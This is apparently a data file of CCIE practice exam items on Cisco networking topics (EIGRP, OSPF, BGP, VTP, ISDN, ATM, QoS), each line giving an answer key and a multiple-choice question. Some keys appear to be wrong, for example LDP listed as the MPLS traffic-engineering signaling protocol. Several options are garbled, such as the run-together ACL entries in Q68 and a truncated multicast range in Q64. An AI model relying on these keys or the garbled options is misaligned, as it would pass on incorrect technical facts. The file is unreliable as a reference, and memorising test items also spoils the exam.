B	#CCIE Q1 Load sharing of VLAN traffic over parallel ISL trunks is:^A. Not possible due to the nature of ISL.^B. Configurable on a per VLAN basis.^C. Configurable on a per packet basis.^D. Automatic due to the nature of ISL and its interaction with the IEEE Spanning Tree protocol.
D	#CCIE Q2 What does the EIGRP Feasibility Condition mean?^A. The FD must be unique.^B. The FD must be higher than zero.^C. The FD must be equal to RD.^D. The RD must be lower than FD.^E. None of the above.
A	#CCIE Q3 A network administrator is running OSPF demand circuit across an ISDN link. What statement iscorrect?^A. The calling router must be network type pointpoint.^B. OSPF demand circuit requires network type non-broadcast.^C. OSPF demand circuit will not trigger the link if an OSPF interface goes down.^D. OSPF demand circuit will bring up the link if the topology of the network changes.
C	#CCIE Q4 In a PIMv2 Sparse Mode network, the incoming interface for a (*, G) mroute entry is calculated using:^A. The address of the source.^B. The address of the PIM neighbor that send the PIM (*, G) Join message.^C. The address of a directory connected member of group G.^D. The address of the currently active Rendezvous Point for group G.^E. The address of the Mapping Agent.
A	#CCIE Q6 Assume a Catalyst 6500 with a Supervisor IA with a MSFC. The MSFC has lost its boot image and thedevice is now in Rommon.^  What method will work to load c6msfcbin?^A. Xmodem^B. FTP^C. TFTP^D. SNMP
A	#CCIE Q8 What statement is FALSE with respect to the operation of Unidirectional Link Detection?^A. It negotiates the Unidirectional Link Detection link state during physical signaling.^B. It performs tasks that autonegotiation cannot perform.^C. It works by exchanging protocol packets between the neighboring devices.^D. Both devices on the link must support Unidirectional Link Detection and have it enabled on respectiveports.
B	#CCIE Q10 What is true concerning Traffic contract, Traffic shaping, and Traffic policing in ATM networks?^A. They are parameters of PNNI set during PNNI configuration.^B. They are forms of QoS features used in ATM networks.^C. They are types of SVCs.^D. They are types of PVCs.^E. They are only used between ATM switches to control traffic flows.
E	#CCIE Q12 Which are the primary reasons to use traffic shaping?^A. To control the maximum rate of traffic transmitted or received on an interface.^B. To control access to available bandwidth.^C. To define Layer 3 aggregate or granular incoming or outgoing bandwidth rate limits.^D. To control the average queue size by indicating to the end hosts when they should temporarily slowdown transmission of packets.^E. To ensure that traffic conforms to the policies established for it.
D	#CCIE Q13 In a bridged network running IEEE 802.1d spanning tree, what parameter will a bridge take form theroot bridge?^A. Maxage^B. Forwarding delay^C. Hello time^D. All of the above
B	#CCIE Q14 What statement is FALSE concerning the use of SPAN on the Catalyst 6500?^A. It is possible to configure SPAN to have a Gigabit port, such as source port, and a 10/100 port as thedestination port.^B. If the source port is configured as a trunk port, the traffic on the destination port will be tagged as well,regardless of the configuration on the destination port.^C. When a SPAN session is active the destination port does not participate in Spanning Tree.^D. With SPAN an entire VLAN can be configured to be the source.^E. In one SPAN session it is possible to monitor multiple ports that do not belong to the same VLAN.
A	#CCIE Q16 What command switches a SONET APS protected circuit over the back-up circuit?^A. aps force atm circuit-.number^B. aps manual circuit-number^C. redundancy force-failover^D. aps backnumber^E. aps force circuit-number
E	#CCIE Q17 What is NOT a BGP attribute?^A. Origin^B. Weight^C. Local_pref^D. Community^E. Cluster_list
A	#CCIE Q18 According to the IEEE 802.11b Wireless LAN specification, what sub-field is NOT part of the FrameControl Field?^A. Duration^B. Power Management^C. Wired Equivalent Privacy^D. More Fragments^E. Order
B	#CCIE Q19 A switch has been configured to support MultiLayer Switching (MLS). ^  In addition, Access Control Listson the MLS-Route Processor have been configured to block all FTP traffic destined to the Internet.^  What flow mask will be used to create each shortcut?^A. Application flow mask.^B. Full flow mask.^C. Destination^D. Destination flow mask.
E	#CCIE Q21 What feature is provided by IOS NAT (Network Address Translation)?^A. Dynamic network address translation using a pool of IP addresses, or port address translation using asingle IP address.^B. Destination based address translation using either route map or extended access-list.^C. Dynamic translation for DNS A and PTR queries.^D. Inside and outside source static network translation that allows overlapping network address spaces onthe inside and the outside.^E. All of the above.
A,B	#CCIE Q22 Which statements about FTP are true?^A. FTP always uses two separate TCP sessions  one for control and one for data.^B. With passive mode FTP, both the control and data TCP sessions are initiated from the client.^C. With active mode FTP, the server used the PORT command to tell the client on which port it wishedto send the data.^D. For both active and passive mode FTP, the control session on the server always uses TCP port 21, andthe data session always uses TCP port 20.
B	#CCIE Q23 A network administrator wants an IP static route to point to a backup link, but only if the same route isnot available via a dynamic routing protocol.^  How would this be accomplished?^A. Create a static route with a lower administrative distance than the dynamic protocol.^B. Create a static route with a higher administrative distance than the dynamic protocol.^C. Create a static route with a lower metric than the dynamic protocol.^D. Create a static route with the floating-static keyword.
C	#CCIE Q24 In Token Ring networks, Layer 3 IP Multicast addresses are mapped into Layer 2 Token Ring Macaddresses in which ways?^A. All IP Multicast addresses are mapped to broadcast MAC address FFFF.FFFF.FFFF.^B. All IP Multicast addresses are mapped to Functional Address C000.0000.0001.^C. All IP Multicast addresses are mapped to Functional Address C000.0004.0000.^D. All IP Multicast addresses are mapped to MAC addresses using the same method as is used in Ethernetnetworks.^E. Configure the Ring Parameter server to set the I/G address to 1.
A	#CCIE Q25 Consider the length of the netmask of a route, the administrative distance and the metric, what comesfirst when the router performs a route lookup in order to decide which interface to be forwarded apacket out of?^A. The length of the netmask of a route.^B. The administrative distance.^C. The metric.^D. None of the above.
A	#CCIE Q28 What trunk mode combination would not produce an operational ISL trunk?^A. Local: auto Remote: auto^B. Local: on Remote: auto^C. Local: nonegotiate Remote: nonegotiate^D. Local: nonegotiate Remote: on^E. Local: auto Remote: desirable
B	#CCIE Q30 A network administrator wants to advertise the network 135.30.0/27 to an EBGP peer. ^  What commandwould be used to accomplish this?^A. network 135.30.45.0 255.255.0.0^B. network 135.30.45.0 mask 255.255.255.224^C. network 135.30.45.0^D. network 135.45.0.0
C	#CCIE Q32 What is the maximum one-way latency allowed by the ITU that is acceptable for the majority of voiceapplications?^A. 15 milliseconds^B. 30 milliseconds^C. 150 milliseconds^D. 300 milliseconds^E. 1.5 seconds
B	#CCIE Q33 Form ATM switched Virtual Circuits to work correctly, what is required?^A. ARP server.^B. Signalling and ILMI PVCs.^C. QoS type set to CBR+.^D. All of the above.
C	#CCIE Q34 MPLS traffic engineering routing information is carried by:^A. BGP MEDs^B. MP-BGP^C. OSPF Opaque LSAs or IS-IS TLVs^D. RTP or RTCP packets
A	#CCIE Q35 What type of EIGRP packets carry the Init flag embedded?^A. Hello^B. Update^C. Query^D. Reply^E. Ack
A	#CCIE Q36 An AT&T 5ESS NI1 switch uses what terminal type of ISDN?^A. Terminal type A.^B. Terminal type B.^C. Terminal type C.^D. Terminal type D.^E. All of the above.
A,C,E	#CCIE Q38 Which are common problems that cause clocking problems on a serial line?^A. Several cables connected together in a row.^B. Too much db gain on the serial line.^C. Incorrect CSU configuration.^D. Impedance mismatch.^E. Incorrect DSU configuration.
B	#CCIE Q39 There is a pointpoint ISDN link between Routers A and ^B. Router A must be able to dial Router B,but Router B must NOT be able to dial Router A.What will accomplish this?^A. Use an IP accessgroup command on the interface.^B. Remove the dial string from Router B.^C. Use the no-dial keyword on the interface.^D. Use the same IP address on both sides of the link.
C	#CCIE Q41 Considering OSPF where a binding between an interface and an area has been done, what is the effect ofdefining such an interface as passive?^A. OSPF will not form any adjacency out if that interface but it will accept the routing updates from theneighbors.^B. OSPF will form all the available adjacencies out of that interface but it wont install any of the learnedroutes in the local routing table.^C. OSPF will not form any adjacency out of that interface.^D. OSPF will behave as a passive adjacency at the requests coming from neighbors, lying out of theinterface, ignoring all the incoming requests.^E. None of the above.
C	#CCIE Q42 With respect to the ATM Reference Model what is NOT one of the ATM layers?^A. Physical layer.^B. ATM adaptation layer (AAL).^C. Generic Flow Control (GFC) layer.^D. ATM layer.
A	#CCIE Q44 What statement is TRUE regarding VLAN Trunk Protocol (VTP) pruning?^A. VTP pruning only affects traffic from VLANs that are pruning eligible.^B. VLAN 1 is always pruning eligible.^C. Pruning eligibility is determined by the amount of ports assigned to a VLAN.^D. VTP pruning is a way to detect the removal of a VLAN within a VTP domain.
C	#CCIE Q45 Routers A, B, and C are running IGRP over frame relay connections. ^  No subinterfaces are used, and asingle IP subnet is used for all the Frame Relay interfaces. ^  Router A is able to see routers from both Router B and Router C, but Router B and Router C cannot see routers from each other.^  Which could be causing this problem?^A. Router A is missing frame maps.^B. Router B and Router C are missing frame maps.^C. Split-horizon is enabled on Router A.^D. Split-horizon is disabled on Router A.
A	#CCIE Q46 What is the goal of the ISIS CSNP and the PSNP packets?^A. PSNP are used either to acknowledge the receipt or to request the retransmission of the latest version ofan LSP while the CSNP are used for synchronizing the LS Database or adjacent neighbors.^B. CSNP are used either to acknowledge the receipt to or to request the retransmission of the latest versionof an LSP while the PSNP are used for synchronizing the LS Database of adjacent neighbors.^C. PSNP are used to acknowledge the receipt of the latest version of an LSP while the CSNP are usedeither for synchronizing the LS Database of adjacent neighbors or to request the retransmission of anLSP.^D. CSNP are used to acknowledge the receipt of the latest version of an LSP while the PSNP are usedeither for synchronizing the LS Database of adjacent neighbors or to request the retransmission of anLSP.
B,C	#CCIE Q47 Suppose a network access server (NAS) is configured to use TACACS+ to provide user authenticationservice for remote access users. ^  The NAS get an ERROR in response to its authentication request when:^A. The TACACS+ service is not running on the server.^B. The supplied user password is incorrect.^C. The username does not exist in the TACACS+ user database.^D. The NAS TACACS+ server key does not match that on the server.^E. The TACACS+ server is unreachable by the NAS.
B,D	#CCIE Q48 Routers 1, 2, 3, and 4 are all connected to a hub via Ethernet interfaces. ^  All routers have a basic OSPFconfiguration of a network statement for the Ethernet network.^  show ip ospf neighbor on Router 2 shows 2WAY/DROTHER for its neighbor, Router 3.^  Which conclusions can we dram from this?^A. R2 is the DR or BDR.^B. R3 is not a DR or BDR.^C. R2  R3 adjacency is not FULL yet as the only possible conclusion.^D. R2 is not the DR.^E. R4 is the DR.
D	#CCIE Q49 A new Catalyst switch is in a lab. ^  It is decided that a download of the latest supervisor image is needed, so the switch is connected to the corporate Catalyst switch in the lab through the supervisor gigabit portsthat are both in VLAN 100 with a single fiber pair. ^  VLAN 100 only existed on the two supervisor portsused and only one router existed in that VLAN. ^  Shortly thereafter thousands of complaints are receivedthat users cannot connect to anything on the network. ^  What command should have been issued on the labswitch prior to connecting to the corporate switch to prevent this problem?^A. Clear cam dynamic.^B. Set spantree uplinkfast enable 1/1.^C. Set trunk 1/1 desirable isl.^D. Set vtp mode transparent.^E. Set port broadcast 1/1 25% unicast enable.
C	#CCIE Q50 The configured passwords for a Catalyst 5000 switch have been lost. The switch will use a knownpassword for the first 30 seconds after boot.What is the password?^A. cisco^B. Cisco^C. Enter key^D. Ctrlx^E. SanFran
C	#CCIE Q51 A company has deployed a new e-commerce web farm. ^  They are using teamed servers that use multicastto maintain a heartbeat between redundant pairs. All servers are in the 192.168.202.0/24 network. ^  Forincreased security, they require each pair of servers be allowed to see multicast/broadcast traffic fromtheir default gateway and from each other. ^  No pair of servers should ever see any broadcast/multicasttraffic from any other pair of servers. ^  Which is the best mechanism for the server ports to accomplishthis?^A. Isolated Ports.^B. Promiscuous Ports.^C. Community Ports.^D. Teamed Ports.^E. Span Ports.
B	#CCIE Q52 Which EIGRP packets are sent using a reliable mechanism?^A. Hello^B. Update^C. Query^D. Reply^E. Ack
A,B,C	#CCIE Q53 Which protocols do not need to have their own router ID reachable by other routers to have propernetwork connectivity?^A. OSPF^B. BGP^C. EIGRP^D. LDP^E. TDP
B,C	#CCIE Q55 Transparent bridges forward, flood, or drop frames based upon entries in the bridge table which may bedynamically added to or removed from the table. ^  Which statements are TRUE regarding bridge tableentries?^A. Bridge table entries are learned by examining the destination MAC address of each frame.^B. Bridge table entries are learned by examining the source MAC address of each frame.^C. Increasing the bridge table aging time would result in a reduction of flooding.^D. Decreasing the bridge table aging time would result in a reduction of flooding.^E. It is important to ensure that the aging time is less than the aggregate time to detect and recalculate thespanning tree.
E	#CCIE Q56 Which events cause the EIGRP neighbor relationship to be restarted?^A. Issuing the clear ip route command.^B. Receiving an update packet with Init flag set from a known, already established neighbor relationship.^C. Receiving an update packet from an unknown neighbor.^D. Clearing the IP cache.^E. Clearing the IP EIGRP neighbor relationship.
D	#CCIE Q57 What protocol is NOT part of the Signaling System No. 7?^A. ISUP^B. TCAP^C. MTP^D. SIP^E. SCCP
A,C	#CCIE Q58 By entering the IOS global configuration command aaa new-model, which authentication protocols willbe disabled?^A. TACACS^B. TACACS+^C. Extended TACACS (XTACACS)^D. Radius^E. Kerberos
B	#CCIE Q59 The IEEE 802.5 standard defines the specifications for token ring networks. ^  The standard uses acentralized ring maintenance mechanism called active monitor that oversees the ring. ^  What is NOT aresponsibility of the active monitor?^A. Checking for lost tokens.^B. Locating breaks in the ring.^C. Removing continuously circulating frames resulting from a failed sending device from the ring-^D. Cleaning up the ring when garbled frames appear.^E. Inserting delay bits to the ring if it is not big enough for the token to circulate.
C	#CCIE Q60 The LAPD protocol is formally specified in:^A. ITU-T T.30^B. ITU-T T.261^C. ITU-T Q.920^D. ITU31^E. ITU931
C	#CCIE Q62 What flag in the TCP header tells the receiver to pass all the data to the receiving application uponarrival?^A. ACK^B. SYN^C. PSH^D. URG^E. RST
A	#CCIE Q63 Routers A and B are running BGP in the same Autonomous System. ^  Routers from Router B show up inthe BGP table of Router ^ A, but not in the routing table of Router A as BGP routes.What might cause this?^A. Synchronization is on but Router A is not receiving the same routes via an internal protocol.^B. Synchronization is off but Router A is not receiving the same routes via an internal protocol.^C. Synchronization is off but the BGP peers are down.^D. Nextself is disabled on Router A.
D	#CCIE Q64 Like the reserved Private IP address ranges (RFC 1918), there is also a list of Class D reserved Multicastaddresses (RFC 1700). ^  Select the correct answer that matches RFC 1700.^A. 224.0.0.0  224.255.255.255^B. 225.0.0.0  225.255.255.255^C. 232.0.0.0  232.255.255.255^D. 239.0.0.0  239255^E. All of the above.
C	#CCIE Q67 Which is the protocol that On-Demand Routing relies on?^A. IP^B. TCP^C. CDP^D. UDP^E. PPP
B	#CCIE Q68 Traceroute does not work on Host A (a Unix workstation) to the Internet. ^  Currently, there is an inboundaccesslist 101 permit tcp any any. ^  Whataccess-list entry may need to be added in order to get traceroute to work?^A. access-list 101 permit udp any any^B. accessexceededaccessunreachable^C. accessexceededaccessunreachable^D. access-list 101 permit icmp any any echoaccessunreachable^E. access-list 101 permit udp any anyaccessunreachable
E	#CCIE Q71 The BGP backdoor command:^A. Changes the distance of an iBGP route to 20.^B. Changes the distance of an eBGP route to 200.^C. Changes the distance of an IGRP route to 200.^D. Changes the distance of an IGP route to 20.^E. Does not change the distance of the route.
D	#CCIE Q73 What is not a valid DNS resource record?^A. MX^B. PTR^C. A^D. FQDN^E. NS
D	#CCIE Q74 router ospf 1redistribute igrp 20 metric 50 subnets^  What is the effect if the subnets keyword in the above configuration?^A. It forces IGRP to support VLSM in this context.^B. It causes OSPF to recognize classful networks.^C. It has not effect, IGRP always summarizes on class boundaries anyway.^D. It causes OSPF to accept networks with non-classful masks.
B,C,D,E	#CCIE Q75 Which four features does RIP version 2 provide, which were impossible with RIP version 1? (Choosefour)^A. Poison reverse and classless routing.^B. Classless routing and split-horizon.^C. Poison reverse and updates to multicast address.^D. Classless routing and updates to multicast address.^E. Route tag and classless routing.
D	#CCIE Q77 What is true about Custom Queuing?^A. Custom queuing will always empty a queue before proceeding to the next queue.^B. Custom queuing can be used to restrict a particular type of traffic to a given bandwidth regardless of theload on that link.^C. Custom queuing looks at groups of packets from the same source-destination pair.^D. Custom queuing can prevent one type of traffic from dominating a busy link.
B	#CCIE Q78 What ISDN reference point network boundary does not have an ITU-T standard?^A. S/T^B. U^C. R^D. S^E. T
A	#CCIE Q79 Which statements are true concerning distance vector and link state routing protocols?^A. Distance vector protocols have a finite limit of hop counts whereas link state protocols do not have alimit on the number of hops for a route.^B. Distance vector protocols have better convergence that link state protocols.^C. RIP is a distance vector protocol whereas RIP version 2 and OSPF are link state protocols.^D. Distance vector protocols only send updates to neighboring routers whereas link state protocols floodupdates to all routers in the within the same routing domain.^E. Both distance vector and link state protocols will take link bandwidth and delays into account whencalculating routes.
D	#CCIE Q80 What security service is NOT provided by IPSec?^A. Data confidentiality.^B. Data integrity.^C. Data origin authentication.^D. Protection for multicast/broadcast traffic.^E. Anti-replay.
E	#CCIE Q81 When configuring IPSec on IOS routers, what is a valid ISAKMP policy parameter?^A. SA lifetime.^B. Encryption algorithm.^C. Hash algorithm.^D. Authentication method.^E. All of the above.
B	#CCIE Q83 Policing on a Fast Ethernet interface has been configured using Committed Access Rate (CAR) to allowfor extended burst. ^  Traffic has been bursty and a packet arrives on the interface that causes thecompounded debt to be greater than the extended burst. What statement is FALSE?^A. The packet is dropped.^B. A token is removed from the token bucket.^C. The compounded debt value is effectively set to zero (0).^D. The packet is not buffered by the CAR process.
B	#CCIE Q84 When connecting two different VLAN Trunk Protocol domains together via and ISL trunk, the switchesfail to form the trunk automatically. ^  What is the likely cause?^A. The trunks need to be set to on or nonegotiate.^B. The VTP domain names carried in the Dynamic Inter-Switch Link (DISL) messages are not the same.^C. The Unidirectional Link Detection timers are shorter than the Spanning Tree Protocol (STP) timers.^D. The native VLANs are the same.^E. The VLAN Trunk Protocol multicast address was set to 01
C	#CCIE Q88 What is the first task required in password recovery on a Catalyst 5000 series switch?^A. Set the configuration register to ignore the startup configuration.^B. Set the boot register to 0x2142.^C. Power cycle the switch.^D. Reload the switch using the reload command.
A	#CCIE Q89 Exhibit:In the MPLS network shown, how many routing tables are on Router TK1?^A. 1^B. 2^C. 3^D. 4^E. 5
A,B	#CCIE Q90 Which statements are FALSE concerning the use of VACLs on the Catalyst 6500 switch? (Choose two)^A. VACLs can be used to forward/drop and redirect traffic based on Layer 2 and Layer 3 information.^B. VACLs cannot be used when using QoS on the switch.^C. VACLs can be used together with RACLs.^D. VACLs can be used for traffic that is being L3 switched.^E. VACLs do not cause extra latency for traffic passing through the switch.
A	#CCIE Q92 According to the IEEE 802.5 Token Ring specification, what fields is an optional component?^A. RI  Routing Information^B. FC  Frame Control^C. FCS  Frame Check Sequence^D. EFS  End of Frame Sequence^E. AC  Access Control
C	#CCIE Q94 What is the purpose of the clock source command used in IOS T1/E1 interface command mode, wandwhat is the default setting?^A. Routers are DTEs and NEVER supply clock to T1/E1 line.^B. clock source identifies the stratum level associated with the router T1/E1 and the default us Stratum 1.^C. clock source chooses a source for the interface to clock outbound data.The default is clock source line Specifies that the T1/E1 link uses the recovered clock from the line.^D. clock source chooses a source for the interface to clock buffered data.The default is clock source loop-timed Specifies that the T1/E1 interface takes the clock from the Tx(line) and uses it for Rx.
A	#CCIE Q96 In Frame Relay traffic shaping, the bc and be parameters are expresses as:^A. Bits per second.^B. Bits per interval.^C. Bytes per second.^D. Bytes per interval.
B	#CCIE Q97 What signaling protocol does Cisco use to provide support for MPLS traffic engineering?^A. RSVP^B. LDP^C. SS7^D. TDP
B,D,E	#CCIE Q98 This inbound ACL is configured on the router:^  access-list 101 permit tcp any host 209.165.201.10 eq telnet^  access-list 101 deny ip any anyWhich types of packets will be permitted through the router?^A. A non-fragment packet going to the server on port 21.^B. A non-initial fragment packet going to the server on port 23.^C. A nonfragment going to another host thats not 229.165.201.10.^D. A non-initial fragment packet going to the server on port 21.^E. An initialfragment packet going to the server on port 23.
B,E	#CCIE Q99 Which two are correct framing types for a T1 data line? (Choose two)^A. B8ZS^B. SF^C. EMI^D. AMI^E. ESF
E	#CCIE Q101 Which are LANE Components that are used to logically establish a LANE network?^A. LECS, redundant LECS, and BUS.^B. SSRP, UNI, NNI and LEC.^C. ILMI, AAL5, LANE and SSCOP.^D. BUS, LES, LEC and VCC.^E. LECS, LES, and BUS.
A	#CCIE Q106 Using a sniffer, it is verified that a Router is receiving a specific SAP but the server is not showing up inthe server table. ^  Which are possible reasons?^A. The Router doesnt know how to get to the IPX network advertised in the SAP packet.^B. The SAP table already contains a similar entry with a different SAP type.^C. There is an Access-list configured to filter out this SAP type.^D. The router only runs NLSP.^E. The server only runs NLSP.
D	#CCIE Q108 ISDN TE2 includes:^A. Devices that manage switching functions.^B. Devices that use the standard ISDN interface.^C. The boundary between the carriers ISDN network and the CPE.^D. Devices that do not use the standard ISDN interface.^E. None of the above.
E	#CCIE Q109 To what IP address does RIPv2 send its own routing update packets?^A. 224.0.0.10^B. 255.255.255.255^C. 224.0.0.13^D. 224.0.0.5^E. 224.0.0.9
E	#CCIE Q110 How does a router behave in relation to an EIGRP stub neighbor?^A. It will send only default-routes toward stub EIGRP neighbors.^B. It well send only summary routes toward stub EIGRP neighbors.^C. It will not query the stub EIGRP neighbor about any internal route.^D. It will not query the stub EIGRP neighbor about any external route.^E. It will not query the stub EIGRP neighbor about any route.
E	#CCIE Q111 An interface has been configured for custom queuing. Bandwidth has been allocated for three flows A, Band C with average packet sizes of 1000 bytes, 500 bytes and 250 bytes respectively. ^  If flow A has beenconfigured to allow one packet per servicing of its queue, how many packets need to be allowed for flowC in order to achieve a ratio of 20:50:30 for flows A, B and C respectively?^A. 1^B. 2^C. 3^D. 4^E. 5^F. 6
D	#CCIE Q112 What effect do these configuration commands have?line vty 0 4no loginpassword cisco^A. The VTY password is cisco.^B. The login password is login^C. The VTY password is required but not set.^D. No password is required for VTY access.
A	#CCIE Q113 Multicast addresses in the range of 239.0.0.0 through 239.255.255.255 are reserved for:^A. Administratively Scoped multicast traffic that is intended to remain inside of a private network and isnever intended to be transmitted into the Internet.^B. Global Internet multicast traffic intended to travel throughout the Internet.^C. Link-local multicast traffic consisting of network control messages that never leave the local subnet.^D. Any valid multicast data stream.
D	#CCIE Q114 What is the tiebreaker used by ISIS to elect the Designated IS on a LAN in a case where all the neighborshave the same priority?^A. The lowest MAC address.^B. The highest router-ID.^C. The lowest router-ID.^D. The highest SNPA.^E. The lowest system-ID.
B,C	#CCIE Q115 When using a sniffer directly connected to an access switch, the sniffer sees an excessive amount ofBPDUs with the TCA bit set.^  Which are the most likely explanations?^A. There are no problem in the network.^B. Ports connecting 2 workstations do not have spanning tree portfast configured.^C. Bad cabling is being used in the network.^D. The CPU utilization on the root switch is getting up to 99% and thus is not sending any BPDUs.
C	#CCIE Q116 A network administrator is using a private IP address space for the network with NAT to allow the usersto reach the Internet. ^  However, there is a web server on the internal network that must have incomingaccess from the Internet.What will be required to accomplish this?^A. Put the web servers internal IP address in the external DNS records.^B. Use a dynamic mapping with the reverse keyword.^C. There must be a static NAT mapping for the web servers address.^D. Dynamic NAT will take care of this automatically.
B	#CCIE Q118 When doing an IPX ping from a Cisco router to a Novell server there is no response.What is a possible cause?^A. Novell Servers never responds to IPX pings.This only works between Cisco Routers.^B. Cisco IPX Pings are being sent to a Novell Server.^C. There is no IPX network configured on Loopback 0.^D. The IPX server table doesnt contain the correct SAP entry.^E. All of the above.
B	#CCIE Q120 What is not a transfer mode supported by HDLC?^A. ARM^B. ARB^C. ABM^D. NRM^E. LAPB
D	#CCIE Q122 According to the IEEE 802.2 Logical Link Control specification, the maximum transmit value for LLCflow control is:^A. 15^B. 127^C. 255^D. 1023^E. 4095
B	#CCIE Q123 The interface command Router (config-if)  invert txclock is used for what purpose?^A. It switches TXD and RXD to correct mis-wired cables.^B. It corrects systems that use long cables that experience high error rates when operating at the highertransmission speeds.^C. It configures the serial interface to monitor the DSR signal as the line up/down indicator.^D. It is used to correct situations where it is possible to send backback data packets over serialinterfaces faster than some hosts can receive them.
D	#CCIE Q124 It is suspected that packets are being lost on a link between one of your routers and the switch. ^  This connection is configured to be Full Duplex 100Mb Ethernet. To diagnose what is going on on this link, aFast Ethernet Hub is connected in between the Router and the Switch and an excessive number ofalignment errors, CRC errors and Late Collisions are seen.^  What statement is true?^A. Either the Router or the Switch is broken.Looking at sniffer traces, the Source MAC address of the error frames will determine what device it is.^B. These errors are not causing a performance problem.^C. The cabling is bad and thus needs to be replaced.^D. Adding the Hub in between might have caused the errors seen on the link.
E	#CCIE Q125 ^  Current configuration:^  version 12.0^  service timestamps debug uptime^  service timestamps log update^  no service password-encryption^  hostname Simon^  enable secret 5 $1$XV53$hqb0Ra7gwpky0cmL4u3EW0^  enable password cisco^  Given the configuration shown above, what should you type to gain enable access on router Simon?^A. cisco^B. Simon^C. 4u3EW0^D. $1$XV53$hqb0Ra7gwpky0cmL4u3EW0^E. Cannot tell
B	#CCIE Q126 What statement is true concerning Multilayer Switching?^A. The first packet in every flow will be forwarded by the MLS Switching Engine.^B. The first packet in every flow will be forwarded by the MLS Route Processor.^C. Every 10th packet in every flow will be redirected to the MLS Route Processor.^D. Every 100th packet in every flow will be forwarded by the MLS Route Processor.^E. All traffic will be forwarded by the MLS Switching Engine.
B	#CCIE Q128 Which layer in the OSI reference model are missing from the TCP/IP reference model?^A. Network^B. Presentation^C. Transport^D. Session^E. Data link
A,C,E	#CCIE Q129 A router running OSPF, that is being connected to Area 0 and Area 1, is configured with area 1 nssadefaultoriginate.Which are false?^A. The router will inject a type 3 default route into area 1.^B. The router will inject a type 7 default route into area 1.^C. The router will inject a type 5 default route into area 1.^D. The router needs a default route in its routing table to inject a default into area 1.^E. The router does not need a default route in its routing table to inject a default into area 1.
E	#CCIE Q131 How many LSPs does a non-pseudonode ISIS router originate?^A. 1 per link.^B. 1 per link and 1 per external route.^C. Always a minimum of 3.^D. 1, but 2 if there are external routes redistributed into ISIS on this router.^E. Always 1.
C	#CCIE Q132 Packets need to be sent, arriving via DLSW+ on Router A to a host on an Ethernet attached to Router A. ^  Bridging is enabled on the Ethernet but packets are not reaching the host. What is most likely theproblem?^A. SRTLB should be run between the source route Virtual Ring and the Ethernet.^B. The DLSW+ peer cost doesnt match the Ethernet bridge group.^C. The DLSW+ bridge-group command is missing.^D. The bridge-group number on the Ethernet is too high.
B	#CCIE Q133 A company has 2 border routers running BGP to 2 different ISPs. ^  They want to control which pathinbound traffic takes without the use of communities. ^  What is the most important consideration?^A. Metric^B. MED^C. AS-path prepending^D. Weight^E. Local preference
B	#CCIE Q135 What statement is TRUE regarding Fast Ethernet Channel?^A. Ports within a Fast Ether Channel do not have to be the same speed and duplex.^B. Port Aggregation Protocol (PAGP) facilitates the automatic creation of Fast Ether channels links.^C. Fast Ethernet Channels can not be configured as a trunk.^D. Ports within a Fast Ether Channels can not be configured as a trunk.^E. Ports within a Fast Ether Channel can be assigned to multiple VLANs.
A	#CCIE Q136 What is NOT true about IRB?^A. IRB allows the same protocol to be bridged and routed through the same physical interface.^B. IRB allows the same protocol to be bridged and routed on the same router.^C. IRB uses a virtual interface to connect bridge and routed interfaces.^D. IRB can support multiple protocols on the same router.
B	#CCIE Q137 When using an LX/LH Gbic, what is the maximum supported cable length when using a Single ModeFiber with a 8.3/9/19 micron Core?^A. 1504 ft (500 m)^B. 6.2 miles (10 km)^C. 3.1 miles (5 km)^D. 4.6 miles (7.5 km)^E. This type of fiber is not supported with an LX/LH gbic.
D	#CCIE Q138 A network administrator wants a filter that only allows IPX network numbers between BB100 andBB1FF (inclusive).What access list will accomplish this?^A. access-list 805 permit range BB100 BB1FF^B. access-list 850 permit any BB100.0000.0000.0000 B1FF.FFFF.FFFF.FFFF^C. access-list 920 permit any BB100.0000.0000.0000 FF.FFFF.FFFF.FFFF^D. None of the above.
C	#CCIE Q139 What command in interface configuration mode would you use to enable RSVP?^A. ip rsvp sender^B. ip rsvp enable^C. ip rsvp bandwidth^D. ip rsvp reservation^E. RSVP is enabled in global configuration mode, not in interface configuration mode.
E	#CCIE Q140 After adding a new switch to the network it is determined that it is not automatically learning the VLANsvia VTP. ^  What is most likely the cause?^A. The other switch is a VTP client.^B. The VTP server has not sent out a periodic VTP advertisement.^C. There are not yet users on the new switch.^D. The native VLAN on the trunk is VLAN 60.^E. The VTP domain name is misconfigured.
B	#CCIE Q141 The log of 7500 with a FDDI interface is showing this message about twice a day^   :%CBUSBADTXEOFVEC: Fddi0/0 ustatus: bad txEof vecIt is learned form the TAC that this message is indicative that the interface has aborted the transmit dueto a claim frame coming in to the interface while the interface was transmitting. ^  The FDDI ring containssome very important web servers and workstations for upper management.^  What action should be taken?^A. The TAC should be contacted and a case should be logged, as this is indicative of a major problem onthe FDDI ring.^B. Claim Frames are a normal occurrence, so no action should be taken.^C. A sniffer should be placed on the ring to find the cause of the claims.^D. The FDDI concentrator should be replaced, and all FDDI cables checked.^E. The FDDI Interface should be replaced.
A	#CCIE Q142 A large number of these messages are seen on a Catalyst console:^  %MLSMOVEOVERFLOW:Too many moves, stop MLS for 5 sec(20000000)^  %MLSRESUMESC:Resume MLS after detecting too many moves^  What is the least likely cause?^A. Transitory Spanning Tree loop^B. Unidirectional Fiber Link^C. Faulty Switch Port^D. Pinnacle Sync Failure
D	#CCIE Q144 Which statement concerning the difference between TACACS+ and RADIUS is NOT true?^A. TACACS+ uses UDP while RADIUS uses TCP for transport.^B. RADIUS only encrypts the password field of the packet while TACACS+ encrypts the entire body ofthe packet.^C. RADIUS is an IETF standard, while TACACS+ is not.^D. TACACS+ sends a separate request for authorization, while RADIUS uses the same request forauthentication and authorization.
A	#CCIE Q145 A legacy ISDN configuration connects, but EIGRP is not sending updates across the link.What could be causing this?^A. The dialer-list is blocking EIGRP.^B. The encapsulation is different on both sides of the link.^C. There is a network type mismatch.^D. The broadcast keyword is missing from the dialer-map.
A	#CCIE Q146 What LSA type does the area range command act on?^A. Type 1 and 2.^B. Type 3 and 5.^C. Type 4.^D. Type 1, 2 and 3.^E. Type 4 and 5.
D	#CCIE Q148 Which LSAs run inside a stub OSPF area?^A. Type1.^B. Type 1 and 3.^C. Type 1 and 2.^D. Type 1, 2 and 3.^E. Type 3 and 5.
A	#CCIE Q149 A port on a FDDI concentrator keeps getting disabled after a few hours and the port has to be manuallyre-enabled.Which are possible causes?^A. The link quality is bad.^B. Someone keeps disabling this port.^C. Claims frames are seen on the Ring.^D. There are too many late collisions.^E. IBM Spanning Tree has been enabled on the Concentrator.
